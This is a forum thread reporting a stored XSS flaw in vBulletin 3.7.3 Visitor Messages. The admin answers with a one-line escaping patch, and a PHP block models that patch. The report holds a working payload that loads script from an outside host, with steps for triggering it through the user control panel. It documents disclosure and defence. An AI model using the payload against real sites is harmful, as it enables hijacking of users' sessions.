Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
    -   vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix (http://www.go4expert.com/articles/vbulletin-373-pl1-xss-vulnerability-t17905/)

SaswatPadhi 8Jun2009 13:49

vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix

NOTICE

THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.

@ admin (shabbir)

Please don't ban me for this, because I have not used this hack for any illegal/harmful purposes (you can check all records). I have just tested an exploit and found it positive. Please fix it soon. I wrote this article to bring this to your eyes first, before anyone else knows about it and takes advantage.

Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.


Action ;)

First, we must check the version of vBulletin used by G4EF:
(1) Open any page such as your user control panel.
(2) View the page source.
(3) You discover this:
Code: css

<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.7.3 CSS
* Style: 'Default Style'; Style ID: 1
*/

@import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
</style>

(4) Perfect! G4EF is not upgraded to the latest 3.8.x vBulletin. So, we can hack it. :)

The vulnerability:
When vBulletin is used with the "Visitor Messages" add-on, we can easily execute external code through an XSS vulnerability that exists. When the XSS script is posted as a visitor message, the data is run through htmlentities() before being displayed to the general public/forum members. However, when a new message is posted, a new notification is sent to the commentee (the one who receives it). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered XSS attack!

How I tested it:
(1) I opened a duplicate account, _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel: usercp.php.
(6) Whoa!! XSS successful!


Conclusion

Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.

I think I deserve some good reputation points and/or some rewards for this !

Sorry shabbir, for using a duplicate account, but you may delete it now. You should also understand that this was important for the security of the forum, and so please don't ban me :p

shabbir 9Jun2009 13:11

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Thanks for reporting, Saswat. Upgrading to 3.7.6 is the preferred solution, which we will also be doing, but here is the quick fix. Since I am using vBulletin 3.7.3 and have all the functionality and plugins tested, I preferred not to upgrade immediately (though I have the upgrade option), and here is the patch for this vulnerability.

Open the usercp.php file.
Go to line number 250.
Find the following code:
Code:

$visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));

Replace with:
Code:

$visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));

And that should be fine for this problem.

vBulletin also recommends upgrading to the latest version, which has all the fixes.
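The line shabbir patches above, modelled as an added example (this is not vBulletin's own code; the helper functions are stand-ins and an assumption, only their names match the patch), to show why raw HTML survives strip_bbcode and why the escaping call belongs outermost:

```php
<?php
// Added example, not vBulletin's own code: a model of the usercp.php line
// from the patch above, with stand-ins for vBulletin's helper functions.
// The stand-ins are assumptions for illustration; only the names match.

// Stand-in for strip_bbcode(): removes [tag]...[/tag] markup only. Like the
// real function, it leaves raw HTML untouched, so a tag survives this stage.
function strip_bbcode($text, $strip_quotes = true, $strip_img = true) {
    return preg_replace('/\[\/?[a-z*]+(?:=[^\]]*)?\]/i', '', $text);
}

// Stand-in for fetch_trimmed_title(): cut the text down to $length characters.
function fetch_trimmed_title($title, $length = 50) {
    return strlen($title) > $length ? substr($title, 0, $length - 3) . '...' : $title;
}

// Stand-ins: censoring and word wrapping do not matter for the escaping issue.
function fetch_censored_text($text) { return $text; }
function fetch_word_wrapped_string($text) { return wordwrap($text, 80, ' ', true); }

// Stand-in for htmlspecialchars_uni(): escape for an HTML body context.
function htmlspecialchars_uni($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Line 250 before the patch: the summary reaches the template with '<' intact.
function summary_before_patch($pagetext) {
    return fetch_word_wrapped_string(fetch_censored_text(
        fetch_trimmed_title(strip_bbcode($pagetext, true, true), 50)));
}

// Line 250 after the patch: escaping is the outermost call, so it runs after
// trimming and no entity such as &lt; can be cut in half by the 50-char limit.
function summary_after_patch($pagetext) {
    return htmlspecialchars_uni(summary_before_patch($pagetext));
}

// Constructed visitor message: BBCode plus a harmless raw HTML tag.
$message = '[b]hi[/b] <i>raw html</i> padding so the text runs past fifty chars';

echo "before: " . summary_before_patch($message) . "\n";
echo "after:  " . summary_after_patch($message) . "\n";

// The check a reviewer wants: no '<' may reach the template after the patch.
var_dump(strpos(summary_after_patch($message), '<') === false);
```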

SaswatPadhi 9Jun2009 17:46

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Glad to know that it's fixed. :)

indiansword 10Jun2009 07:05

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Nice find. I really like XSS vulnerabilities. Not 100% sure, but I think it's already been reported to miliw0rm a couple of months back.

SaswatPadhi 10Jun2009 07:14

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
What's miliw0rm?

indiansword 10Jun2009 07:20

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Check out miliw0rm.com; all the vulnerabilities found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role in helping the developers of different CMSes release new versions of their software after fixing the vulnerabilities.

SaswatPadhi 10Jun2009 07:47

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com.
Lots of vulnerabilities and an MD5 cracker too: a perfect package for hackers.

indiansword 10Jun2009 07:50

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Yea, sorry for that spelling mistake.

shabbir 10Jun2009 08:55

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Yes, it was found on many other websites as well, but no one had the patch unless you upgraded the complete code, and so here I provided the patch as well. Enjoy

harshit 10Jun2009 13:36

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Great piece of information.

mayjune 15Jun2009 21:28

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
Can you explain what XSS is? I searched, but I am still not getting it...

shabbir 16Jun2009 09:26

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Check out Css > Cross Site Scripting and Stealing Cookie With XSS

shabbir 2Jul2009 11:21

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Nomination for article of the month - Jun 2009 Started. Nominate this article for Article of the month - Jun 2009

shabbir 15Jul2009 23:21

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Start voting for this article for Article of the month - June 2009
